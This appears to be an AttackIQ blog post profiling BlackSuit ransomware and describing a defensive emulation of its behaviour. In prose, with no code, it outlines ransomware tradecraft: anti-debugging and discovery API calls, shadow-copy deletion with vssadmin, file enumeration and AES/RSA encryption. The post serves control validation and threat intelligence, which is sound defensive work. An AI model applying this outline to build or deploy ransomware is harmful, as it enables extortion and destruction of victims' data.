BlackSuit is a ransomware strain that has been active since at least May 2023. It represents the evolution of the ransomware previously identified as Royal ransomware, which was active from approximately September 2022 through June 2023. BlackSuit shares significant code-level similarities with Royal while introducing enhanced functionality and operational refinements, indicating a direct lineage rather than a separate affiliate operation.
Phishing emails remain one of the most effective initial access vectors observed in BlackSuit intrusions. Following initial compromise, operators establish persistence, disable antivirus and security tooling, and exfiltrate large volumes of sensitive data before deploying the ransomware payload to encrypt affected systems. Its operators follow a well-established double-extortion model, conducting data exfiltration prior to encryption and threatening public disclosure via a Dedicated Leak Site (DLS) if ransom demands are not met.
BlackSuit employs a distinctive partial encryption strategy that allows operators to selectively encrypt a configurable percentage of each file. This approach enables a lower encryption percentage for larger files, significantly increasing encryption speed while reducing behavioral indicators that could trigger security detections.
Ransom demands associated with BlackSuit operations typically range between approximately USD $1 million and $10 million, with payments demanded exclusively in Bitcoin. Cumulatively, BlackSuit actors have demanded more than USD $500 million, with the largest known single ransom demand reaching USD $60 million. While ransom amounts are not disclosed in the initial ransom note, victims are directed to communicate with the operators via a Tor-hosted (.onion) portal, where negotiations frequently occur, and operators have demonstrated a willingness to adjust payment terms.
AttackIQ has released a new attack graph that emulates the Tactics, Techniques, and Procedures (TTPs) associated with the deployment of BlackSuit ransomware to help customers validate their security controls and their ability to defend against this threat.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new emulation in the AttackIQ Adversarial Exposure Validation (AEV) Platform, security teams will be able to:
- Evaluate security control performance against baseline behaviors associated with the BlackSuit ransomware.
- Assess their security posture against an opportunistic adversary, which does not discriminate when it comes to selecting its targets.
- Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on ransomware activities.
[Malware Emulation] BlackSuit Ransomware – 2024-08 – Associated Tactics, Techniques and Procedures (TTPs)
This emulation replicates the sequence of behaviors associated with the deployment of BlackSuit ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.
The emulation is based on behaviors reported by the Cybersecurity and Infrastructure Security Agency (CISA) on August 27, 2024, and the DFIR Report on August 26, 2024.
Execution & Discovery – Environment Reconnaissance
This stage begins with the deployment of the BlackSuit ransomware, which, once operational, attempts to detect the presence of a debugger by invoking the IsDebuggerPresent API. It then gathers general system information using the GetNativeSystemInfo API, enumerates running processes via the CreateToolhelp32Snapshot, Process32FirstW, and Process32NextW APIs, and infers the geographic and regional context of the compromised environment through the EnumSystemLocalesW, GetLocaleInfoW, and GetUserDefaultLCID APIs.
2023-05 BlackSuit Ransomware Sample (T1105): The BlackSuit Ransomware Sample (SHA256: 90ae0c693f6ffd6dc5bb2d5a5ef078629c3d77f874b2d2ebd9e109d8ca049f2c) is saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
Debugger Detection via “IsDebuggerPresent” Native API (T1497): This scenario will execute the IsDebuggerPresent Windows API to detect the presence of a debugger attached to the current process.
System Information Discovery via “GetNativeSystemInfo” Native API (T1082): This scenario executes the GetNativeSystemInfo Native API call to retrieve information associated to the system.
Process Discovery via Native API (T1057): This scenario uses Windows API to receive a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.
Enumerate System Locales via “EnumSystemLocalesW” Windows API (T1614): This scenario executes the EnumSystemLocalesW Windows API to enumerate the locales installed on or supported by the operating system.
Obtain System Locales Information via “GetLocaleInfoW” Windows API (T1614): This scenario executes the GetLocaleInfoW Windows API to retrieve the user’s default country locale code from the system.
Get User Default Locale ID via “GetUserDefaultLCID” Native API (T1614): This scenario executes the GetUserDefaultLCID Windows API to retrieve the user default locale ID from the system.
Impact – BlackSuit Ransomware Encryption
This stage begins with the deletion of existing Volume Shadow Copies through vssadmin.exe. Next, it identifies available logical drives via GetLogicalDriveStringsW and performs filesystem traversal and file enumeration using FindFirstFileW and FindNextFileW. Finally, BlackSuit encrypts the identified files using a combination of AES-256 in CTR mode for file encryption and RSA-4096 for key encryption.
Delete created Volume Shadow Copy using “vssadmin.exe” (T1490): This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.
Logical Drive Discovery via “GetLogicalDriveStringsW” Native API (T1680): This scenario executes the GetLogicalDriveStringsW Windows API to retrieve information regarding the system’s physical drives.
File and Directory Discovery via “FindFirstFileW” and “FindNextFileW” Native API (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.
BlackSuit File Encryption (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by BlackSuit ransomware.
Wrap-up
In summary, this emulation will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by BlackSuit ransomware. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ®, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.
